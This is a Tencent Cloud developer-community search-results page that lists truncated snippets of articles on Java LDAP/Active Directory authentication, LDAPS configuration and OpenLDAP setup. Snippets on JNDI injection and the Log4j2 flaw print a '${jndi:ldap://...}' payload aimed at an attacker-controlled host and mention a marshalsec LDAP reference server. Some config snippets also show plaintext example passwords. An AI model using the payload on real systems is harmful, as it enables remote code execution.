javax.naming.CommunicationException LDAP SSL InitialLdapContext - 腾讯云开发者社区

文章/答案/技术大牛

发布

LDAP简介及Java、客户端连接

com.lydms.demospringtransaction.controller; //package test; import javax.naming.AuthenticationException; import javax.naming.CommunicationException...; import javax.naming.Context; import javax.naming.ldap.InitialLdapContext; import javax.naming.ldap.LdapContext...连接地址 ldap://IP:PORT (default port 389) String LDAP_URL = ""; //LDAP SSL连接地址 ldaps:/.../IP:PORT (default port 636) //(这个用起来比较麻烦，目前知道管理员改密码必须使用SSL) String LDAP_SSL_URL = "";...(Context.PROVIDER_URL, LDAP_URL); ctx = new InitialLdapContext(HashEnv, null);//new InitialDirContext

1.5K3 1

配置启用基于SSL的LDAP(LDAPS)

配置启用基于SSL/TLS的LDAP(LDAPS) 目录安装证书服务ADCS 配置ADCS 证书配置默认情况下，LDAP 通信未加密。...这就是许多企业安全策略通常要求组织加密所有 LDAP 通信的原因。...为了减少这种形式的数据泄露，微软提供了一个选项：您可以启用通过安全套接字层 (SSL)/传输层安全性 (TLS) 的 LDAP，也称为 LDAPS。利用 LDAPS，您可以提高整个网络的安全性。

10.4K3 3

您找到你想要的搜索结果了吗？

是的

没有找到

Java LDAP统一身份认证

; import javax.naming.ldap.InitialLdapContext; import javax.naming.ldap.LdapContext; /** * 用户登陆认证...,LDAP跨域认证，通过LDAP对用户进行更新 * */ public class LdapCheck { private static LdapContext ctx = null...; private static Control[] connCtls = null; /**** 定义LDAP的基本连接信息 ******/ // LDAP的连接地址（ldap...; // LDAP的连接账号（身份认证管理平台添加的应用账号，应用账号格式：uid=?,ou=?,dc=????）...ctx = new InitialLdapContext(env, connCtls); } catch (javax.naming.AuthenticationException

1.1K2 0

Confluence 6 通过 SSL 连接 LDAP 和 Jira 应用等其他服务

这个页面的文档将会配置 SSL，而不是 Confluence 自己。Atlassian 将会支持 Confluence 使用这个配置，但是我们不能保证能够解决所有你在 SSL 中遇到的问题。...这个页面的下面描述了如何通过 SSL （通过一系列的 SSL 包装的协议）让你的 Confluence 连接到一个外部服务器。...下面是你可能需要通过 SSL/HTTPS 连接到外部服务器的一些示例：你需要连接到一个 LDAP 服务器，例如 Active Directory，如果你的 LDAP 服务器是通过 SSL 运行的。...Confluence SSL plugin 插件是被用来完成 SSL 操作的。...https://www.cwiki.us/display/CONF6ZH/Connecting+to+LDAP+or+Jira+applications+or+Other+Services+via+SSL

1.3K4 0

Spring Boot 2.0 项目实现自同步AD域账号顶

在通过Spring Boot的自动化装配功能及JDK自带的LDAP模块，可通过如下几个简单步骤实现业务系统自动同步AD域账号功能。 1....Java自带ldap搜索域账号信息核心代码： try { LdapContext ctx = new InitialLdapContext(env, null); SearchControls...通过application.properties增加自定义配置 quickdoc.ldap.username=michael@mxleader.cn quickdoc.ldap.password=chenbichao...quickdoc.ldap.url=LDAP://192.168.15.100:389 quickdoc.ldap.searchBase=OU=XXX有限公司,OU=XXX集团,DC=mxleader...returnedAtts[], String searchBase) throws NamingException { LdapContext ctx = new InitialLdapContext

2.5K3 0

使用JAVA进行ad域身份验证常用属性详解

", "3000"); // LDAP连接池 env.put("com.sun.jndi.ldap.connect.pool", "true"); //...LDAP连接池最大数 env.put("com.sun.jndi.ldap.connect.pool.maxsize", "3"); // LDAP连接池优先数...env.put("com.sun.jndi.ldap.connect.pool.prefsize", "1"); // LDAP连接池超时 env.put("com.sun.jndi.ldap.connect.pool.timeout...", "300000"); // LDAP连接池初始化数 env.put("com.sun.jndi.ldap.connect.pool.initsize", "1");...try { dc = new InitialLdapContext(env, null); logger.info("域用户" + this.username + " 登录" + account

3.3K2 0

[LDAP: error code 34 - invalid DN]

报错完整错误org.springframework.ldap.InvalidNameException: [LDAP: error code 34 - invalid DN]; nested exception...org.springframework.ldap.core.LdapTemplate.search(LdapTemplate.java:518)at com.ldap.LdapTest.listUsers...InitialContext.java:313)at javax.naming.InitialContext.init(InitialContext.java:244)at javax.naming.ldap.InitialLdapContext...(InitialLdapContext.java:154)at org.springframework.ldap.core.support.LdapContextSource.getDirContextInstance...:389spring.ldap.username=adminspring.ldap.password=123456spring.ldap.base=dc=node3,dc=comLdapTest@Testpublic

2371 0

Java实现AD域登录认证「建议收藏」

@noker.cn.com String port = "389"; //端口，一般默认389 String url = new String("ldap://" + host...实例化一个Env DirContext ctx = null; env.put(Context.SECURITY_AUTHENTICATION, "simple");//LDAP...Context.SECURITY_CREDENTIALS, password);//密码 env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory...");// LDAP工厂类 env.put(Context.PROVIDER_URL, url);//Url try { ctx = new...; e.printStackTrace(); } catch (javax.naming.CommunicationException e) {

1.6K1 0

使用java连接AD域,验证账号密码是否正确

一般有AD域,Ldap,Radius,邮件服务器等。最常用的要数AD域了。因为window系统在国内占据了大量的江山。做起来也很方便。我这篇文章就是写，如何用java去实现AD域的身份验证。...HashEnv = new Hashtable(); HashEnv.put(Context.SECURITY_AUTHENTICATION, "simple"); // LDAP..."); // LDAP工厂类 HashEnv.put("com.sun.jndi.ldap.connect.timeout", "3000");//连接超时设置为3秒 HashEnv.put(Context.PROVIDER_URL..., "ldap://" + host + ":" + post);// 默认端口389 try { ctx = new InitialDirContext(HashEnv);// 初始化上下文...; e.printStackTrace(); } catch (javax.naming.CommunicationException e) { System.out.println("

3.2K3 0

用户登录与AD域集成

集成开发登录验证 3.1 全局配置 ldap.url = ldap://10.0.58.222:389/ ldap.org = ou\=\u6F4D\u6fF4\u7328\u6237,dc\=weichai...,dc\=com ldap.user = #### ldap.password = ##### ldap.ldapfactory = com.sun.jndi.ldap.LdapCtxFactory ldap.authentication...("ldap.authentication"); org = Global.getConfig("ldap.org"); user = Global.getConfig(...; } catch (javax.naming.CommunicationException e) { logger.error(e.toString());...; } catch (javax.naming.CommunicationException e) { logger.error(e.toString()); throw new AuthenticationException

3.9K2 0

Java安全之JNDI注入

ldap:// com.sun.jndi.url.ldap.ldapURLContext LDAP ldaps:// com.sun.jndi.url.ldaps.ldapsURLContextFactory...随后在6u211,7u201.8u191中，又新增了 com.sun.jndi.ldap.object.trustURLCodebase选项，默认为false，禁止LDAP协议使用远程codebase选项...JNDI+LDAP ldap的属性值中可以被用来存储Java对象，通过Java序列化，或者 JNDI Reference 来存储。...(LDAP|RMI)RefServer # [] 例如LDAP Server使用工具起 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar...漏洞虽然出现在 InitialContext 及其子类 (InitialDirContext 或 InitialLdapContext) 的 lookup 上，但也有许多其他的方法间接调用了 lookup

8393 0

百度和苹果疑似中招log4j2漏洞！

攻击者在利用前通常采用 dnslog 方式进行扫描、探测，常见的漏洞利用方式可通过应用系统报错日志中的javax.naming.CommunicationException、javax.naming.NamingException...attacker-controlled HTTP User Agent header. // The attacker can set their User-Agent header to: ${jndi:ldap...服务器记录请求中的数据，包含恶意负载：（${jndi:ldap://xttblog.com/a}其中 xttblog.com 是攻击者控制的服务器）。

1K2 0

Apache DolphinScheduler 从1.3.4升级至3.1.2过程中的问题记录

types (supported types: PASSWORD,LDAP) type: LDAP # IF you set type `LDAP`, below config will...be effective ldap: # ldap server config urls: xxx base-dn: xxx username:...identity-attribute: xxx email-attribute: xxx # action when ldap user is not...,password,identity和email 正确填写，不知道email字段名可以按下面的方式处理，email先空着启动服务后用LDAP用户登录解决办法： LDAP 认证的代码在 dolphinscheduler-api...= new InitialLdapContext(searchEnv, null); SearchControls sc = new SearchControls(); sc.setReturningAttributes

2.1K0 0

LDAP基础安装与简单入门使用.md

连接到LDAP服务器；绑定到LDAP服务器；在LDAP服务器上执行所需的任何操作；释放LDAP服务器的连接；我们以PHP脚本作为例子如下： $ldapconn = ldap_connect...端口说明: 端口号备注 389 未加SSL缺省端口(明文数据传输) 689 SSL加密端口 636 加密监听端口(加密数据传输) 基于 yum 安装环境准备: #SeLinux设为disabled...组织者：--env LDAP_ORGANISATION="weiyigeek" 配置LDAP域：--env LDAP_DOMAIN="weiyigeek.top" 配置LDAP密码：--env LDAP_ADMIN_PASSWORD...; import javax.naming.ldap.InitialLdapContext; import javax.naming.ldap.LdapContext; /** * @author...Context.SECURITY_CREDENTIALS, "youedata520"); // 管理员密码 try { ctx = new InitialLdapContext

4.5K2 1

LDAP 中继扫描

此工具尝试枚举的 LDAP 保护包括： LDAPS -通道绑定 LDAP -服务器签名要求可以从未经身份验证的角度确定通过 SSL/TLS 对 LDAP 执行通道绑定。...在域控制器上通过 SSL/TLS 流量解密和监视 LDAP 允许在强制执行通道绑定与未强制执行通道绑定时识别绑定尝试期间的错误差异。...image.png data 8009034注意： LDAP over SSL/TLS 绑定期间的错误提及[1] [2] [3] [4] [5] [LDAP] 服务器签名要求在域控制器上，调用的策略....Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2) ldapServer = ldap3.Server(....Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2) #ldapServer = ldap3.Server(dcTarget, use_ssl

2.5K1 0

组件分享之后端组件——LDAP仓库docker-openlda

LDAP_TLS_CRT_FILENAME：Ldap ssl 证书文件名。默认为ldap.crt LDAP_TLS_KEY_FILENAME：Ldap ssl 证书私钥文件名。...默认为ldap.key LDAP_TLS_DH_PARAM_FILENAME：Ldap ssl 证书 dh 参数文件。...默认为dhparam.pem LDAP_TLS_CA_CRT_FILENAME：Ldap ssl CA 证书文件名。...LDAP_REMOVE_CONFIG_AFTER_SETUP：设置后删除配置文件夹。默认为true LDAP_SSL_HELPER_PREFIX：ssl-helper 环境变量前缀。...默认为ldap, ssl-helper 首先从 LDAP_SSL_HELPER_* 变量中搜索配置，在 SSL_HELPER_* 变量之前。

9151 0

CentOS 7 部署LDAP服务并启用TLS加密

关于SSL/TLS LDAP over SSL # LDAP over SSL 也就是 ldaps # ldap默认不加密情况下是走的389端口 # 当使用ldaps的时候走的就是636端口了 # 可以简单理解成...ldap.pem ca.pem 是我们需要的 [root@master ssl]#ls ca-config.json ca.csr ca-key.pem ca.pem ldap-ca-csr.json...clone https://github.com/JyBigBoss/docker-compose.git cd docker-compose/LDAP/ 复制证书 mkdir ssl/ cp $HOME.../ssl/{ldap-key.pem,ldap.pem,ca.pem} ssl/ 修改docker-compose.yaml文件 vi docker-compose.yaml # 修改下面的几项 #...lam ldapconf ldapdata ssl [root@master LDAP]#docker ps -a CONTAINER ID IMAGE

2.2K2 0

如何在服务器上安装OpenLDAP

之后，我们将安装phpLDAPadmin，一个用于查看和操作LDAP信息的Web界面。我们将使用腾讯云SSL证书来保护Web界面和LDAP服务。...关于自签名证书，你可以参考为Apache创建自签名SSL证书和如何为Nginx创建自签名SSL证书这两篇文章。第一步、安装和配置LDAP服务器我们的第一步是安装LDAP服务器和一些相关的程序。...第四步、配置SSL LDAP加密虽然我们已经加密了我们的Web界面，但外部LDAP客户端仍然连接到服务器并以纯文本形式传递信息。让我们使用腾讯云的SSL证书为我们的LDAP服务器添加密。...为此，我们将所有配置更改放在LDIF文件中，然后使用ldapmodify命令将更改加载到LDAP服务器中。打开一个新的LDIF文件： cd ~ nano ssl.ldif 这将打开一个空白文件。...这时，我们已经成功加密了我们的LDAP连接。结论在本教程中，我们安装并配置了OpenLDAP 服务器和phpLDAPadminWeb界面。我们还在两台服务器上设置了SSL加密。

4.5K2 1

xwiki管理指南-认证

=1 #-# [Since 1.3M2, XWikiLDAPAuthServiceImpl] #-# SSL connection to LDAP server #-# - 0: normal #-#...- 1: SSL #-# The default is 0 # xwiki.authentication.ldap.ssl=0 #-# [Since 1.3M2, XWikiLDAPAuthServiceImpl...] #-# The keystore file to use in SSL connection # xwiki.authentication.ldap.ssl.keystore= #-# [Since...is com.sun.net.ssl.internal.ssl.Provider # xwiki.authentication.ldap.ssl.secure_provider=com.sun.net.ssl.internal.ssl.Provider.../wiki.keytab chmod 400 /etc/apache2/ssl/wiki.keytab 在Linux安装mod_auth_kerb。

1.9K1 0

附006.harbor.cfg配置文件详解

ssl_cert：SSL证书的路径，仅在协议设置为https时应用。 ssl_cert_key：SSL密钥的路径，仅在协议设置为https时应用。...另外，请注意，在默认情况下SSL连接时没有启用，如果SMTP服务器需要SSL，但不支持STARTTLS，那么应该通过设置启用SSL email_ssl = TRUE。...ldap_url：LDAP端点URL（例如ldaps://ldap.mydomain.com）。仅在auth_mode设置为ldap_auth时使用。...ldap_search_pwd：ldap_searchdn指定的用户密码。 ldap_basedn：查找用户的基本DN，例如ou=people,dc=mydomain,dc=com。...ldap_scope：搜索用户的范围，0-LDAP_SCOPE_BASE，1-LDAP_SCOPE_ONELEVEL，2-LDAP_SCOPE_SUBTREE。默认值为2。

1.5K1 0

点击加载更多

LDAP简介及Java、客户端连接

配置启用基于SSL的LDAP(LDAPS)

Java LDAP统一身份认证

Confluence 6 通过 SSL 连接 LDAP 和 Jira 应用等其他服务

Spring Boot 2.0 项目实现自同步AD域账号顶

使用JAVA进行ad域身份验证常用属性详解

[LDAP: error code 34 - invalid DN]

Java实现AD域登录认证「建议收藏」

使用java连接AD域,验证账号密码是否正确

用户登录与AD域集成

Java安全之JNDI注入

百度和苹果疑似中招log4j2漏洞！

Apache DolphinScheduler 从1.3.4升级至3.1.2过程中的问题记录

LDAP基础安装与简单入门使用.md

LDAP 中继扫描

组件分享之后端组件——LDAP仓库docker-openlda

CentOS 7 部署LDAP服务并启用TLS加密

如何在服务器上安装OpenLDAP

xwiki管理指南-认证

附006.harbor.cfg配置文件详解

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐